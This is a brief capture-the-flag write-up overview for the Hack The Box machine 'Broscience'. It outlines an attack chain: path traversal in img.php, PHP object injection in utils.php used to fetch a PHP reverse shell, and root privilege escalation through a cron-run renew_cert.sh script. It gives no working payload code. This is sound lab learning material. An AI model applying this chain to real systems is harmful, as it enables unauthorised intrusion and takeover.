Hack The Box - Broscience [Medium] - 20/08/2023
HTB Writeup
Short Overview
The video consist of my process of enumeration and overall hacking the machine, please use this as a walkthrough.
This box consist of several vulnerabilities:
- Local File Inclusion/Path traversal - The query string
path=
in theimg.php
file is vulnerable to that, with that we can download the site map that I’ve discovered using Burp - Deserialization / PHP Object Injection - I saw that in the
utils.php
file, and I’ve prepared a payload for theAvatarInterface
since this is the class that is using magic methods, and it has thefile_get_contents
function that we are going to use to pull the PHP reverse shell. - Linux Privilege Escalation - By pure luck, I noticed the
renew_cert.sh
in the/opt/
folder, and I immediately noted that this must be the vector that needs to be leveraged to gain privilege escalation. A much better way to figure out this can be the pspy tool, which could have shown me this command that is being run as root:timeout 10 /bin/bash -c /opt/renew_cert.sh /home/bill/Certs/broscience.crt
and I did look up for some hints, thanks to gatogamer1155and his writeup for this machine.